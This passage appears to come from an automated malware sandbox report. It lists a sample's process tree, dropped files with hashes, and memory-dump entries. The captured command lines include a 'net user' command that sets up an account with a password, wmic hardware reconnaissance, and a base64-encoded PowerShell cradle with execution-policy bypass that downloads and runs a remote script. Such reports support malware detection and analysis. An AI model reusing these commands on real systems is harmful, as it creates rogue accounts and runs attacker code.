-
  Process (depth 2): C:\Windows\system32\net.exe
    Command line: net.exe user updwin L6kbkYfK
    - Suspicious use of WriteProcessMemory
-
    Process (depth 3): C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user updwin L6kbkYfK
-
Process (depth 1): C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - Suspicious use of WriteProcessMemory
-
  Process (depth 2): C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic path win32_VideoController get name
    - Modifies data under HKEY_USERS
-
Process (depth 1): C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
  - Suspicious use of WriteProcessMemory
-
  Process (depth 2): C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic CPU get NAME
-
Process (depth 1): C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - Suspicious use of WriteProcessMemory
-
  Process (depth 2): C:\Windows\system32\cmd.exe
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - Suspicious use of WriteProcessMemory
-
    Process (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Blacklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES5190.tmp
MD5: 6e3c7b357f90d8b14092ce52576d2762
SHA1: 4f424b3a2ac5f86b5a650b984d6920c3b829a9fb
SHA256: 80dad56aca25de73f0ab2502cf3260f3662dac511a86306c0354f9a5ebaa0489
SHA512: ce33c98c9963465a708cc610d85de962c7849a4f11a2a1f539d160a6ada2fbf9f366982b683b63171b1796389a3ce31d4b4ce86d656eda4643f34ac8de133001
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5: dac6b25db50155c0c78d5bf64fb95fa3
SHA1: 9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA256: 6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512: 679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zip
MD5: 7cac19b2868c41555db4b71219217f9b
SHA1: d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256: d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA512: 5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Users\Admin\AppData\Local\Temp\z2mm4oij\z2mm4oij.dll
MD5: 36c38fa0e6665f7cac1a4adfc5678b3b
SHA1: 36fa461bb4d7cd8eb3c49ba9619aec5e5f47ec3d
SHA256: 9450b2dfe83775c359afe633bd8f05fd36732b127960776390606757e49848f4
SHA512: a51303a60aeccaa5e58712e0ed5e54e5bb511bc6794eae79560effb125d8c80881876bd85f3a06aec1c682ca62da83d8f559f9cc9db850c3e51ca6d24c2d148e
-
\??\c:\Users\Admin\AppData\Local\Temp\z2mm4oij\CSC275C1D5BBB7C49098089648E4E3A7A1A.TMP
MD5: 8bdc8cf250970c8a0b92246776213531
SHA1: 065e1ce138893080d6e4010cdbd1935100a39104
SHA256: 91d1682e3c341c2d7151abc13f03aeb2481dd07b2261d302687635bef38244b4
SHA512: b1a2f5259909977ebb84cc286e99e87734e4d5a9e1a23c6d670610abbcbd516428d53bd4ec2d0e2f40bcdf26825dcd16738fc947b9b19617ceef0d6e68e150a8
-
\??\c:\Users\Admin\AppData\Local\Temp\z2mm4oij\z2mm4oij.0.cs
MD5: 6f235215132cdebacd0f793fe970d0e3
SHA1: 2841e44c387ed3b6f293611992f1508fe9b55b89
SHA256: ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512: a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\z2mm4oij\z2mm4oij.cmdline
MD5: 8c80ff39bb32ddab61996a6d0f3d4256
SHA1: ab2bc98466fd5ca4be5e74222cf773efa27fda6b
SHA256: 1d2a15739df0da92c093e35d3d11fb4fc1bcf45cced543e41fdba5766dc01975
SHA512: 0207eced12d80d54c6b16e644de1ae4282aa998556895a1d3f2609303374ce32df3a4d56beea23440f88ad190b2514a0a89082ca0bd45baef91e9a32b91707a0
-
\Windows\Branding\mediasrv.png
MD5: eeb448ea2709c57b9ea2e223d0c79396
SHA1: 38331dd027386151ee37a29a7820570a76427b02
SHA256: c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512: c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.png
MD5: bb873bd05a47f502ee4ed3c4ea749a4f
SHA1: e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256: a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512: ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/184-36-0x0000000000000000-mapping.dmp
-
memory/364-20-0x0000000000000000-mapping.dmp
-
memory/500-17-0x0000000000000000-mapping.dmp
-
memory/648-18-0x0000000000000000-mapping.dmp
-
memory/688-44-0x0000000000000000-mapping.dmp
-
memory/812-21-0x0000000000000000-mapping.dmp
-
memory/904-19-0x0000000000000000-mapping.dmp
-
memory/1056-22-0x0000000000000000-mapping.dmp
-
memory/1216-23-0x0000000000000000-mapping.dmp
-
memory/1316-41-0x0000000000000000-mapping.dmp
-
memory/1332-38-0x0000000000000000-mapping.dmp
-
memory/1404-24-0x0000000000000000-mapping.dmp
-
memory/1412-25-0x0000000000000000-mapping.dmp
-
memory/1492-26-0x0000000000000000-mapping.dmp
-
memory/1584-27-0x0000000000000000-mapping.dmp
-
memory/1764-7-0x0000000000000000-mapping.dmp
-
memory/2240-30-0x0000000000000000-mapping.dmp
-
memory/2376-31-0x0000000000000000-mapping.dmp
-
memory/2536-32-0x0000000000000000-mapping.dmp
-
memory/2572-40-0x0000000000000000-mapping.dmp
-
memory/2604-45-0x0000000000000000-mapping.dmp
-
memory/2604-46-0x00007FFBDEDD0000-0x00007FFBDF7BC000-memory.dmp
Filesize: 9.9MB
-
memory/2608-33-0x0000000000000000-mapping.dmp
-
memory/2628-35-0x0000000000000000-mapping.dmp
-
memory/3092-14-0x00000212820B0000-0x00000212820B1000-memory.dmp
Filesize: 4KB
-
memory/3092-2-0x0000000000000000-mapping.dmp
-
memory/3092-3-0x00007FFBDEDD0000-0x00007FFBDF7BC000-memory.dmp
Filesize: 9.9MB
-
memory/3092-4-0x000002129A0D0000-0x000002129A0D1000-memory.dmp
Filesize: 4KB
-
memory/3092-5-0x000002129B160000-0x000002129B161000-memory.dmp
Filesize: 4KB
-
memory/4056-43-0x0000000000000000-mapping.dmp
-
memory/4128-51-0x0000000000000000-mapping.dmp
-
memory/4188-50-0x0000000000000000-mapping.dmp
-
memory/4288-10-0x0000000000000000-mapping.dmp
-
memory/4400-16-0x0000000000000000-mapping.dmp
-
memory/4416-15-0x0000000000000000-mapping.dmp
-
memory/4496-42-0x0000000000000000-mapping.dmp
-
memory/4532-37-0x0000000000000000-mapping.dmp
-
memory/4600-34-0x0000000000000000-mapping.dmp
-
memory/4632-39-0x0000000000000000-mapping.dmp
-
memory/4636-1-0x00000000018C0000-0x00000000018C1000-memory.dmp
Filesize: 4KB